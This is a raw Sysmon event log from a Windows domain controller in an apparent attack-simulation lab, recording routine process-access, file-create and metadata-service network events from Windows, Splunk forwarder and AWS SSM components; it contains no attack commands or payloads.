12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.110{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.110{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.908{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43563744C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43563744C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:05.579{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDA30519DFEF499378E04DC6C3FC30E3,SHA256=4AFCA92042F7FF1C9FE70533974043670F6F00DEB788BACF635E2A8B3DC84268,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.399{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53651-false169.254.169.254-80http 354300x80000000000000009926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.267{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53650-false169.254.169.254-80http 354300x80000000000000009925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.216{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53649-false169.254.169.254-80http 354300x80000000000000009924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.213{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53648-false169.254.169.254-80http 10341000x80000000000000009938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.656{266CAFBE-65AE-6064-5301-00000000AE01}39524316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.594{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF6DFB0B72455840538463D0049079F,SHA256=DB28A0D2837E8D3E51E2892C4D31C378ACA721E49F558330FA581F54B6A31AB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 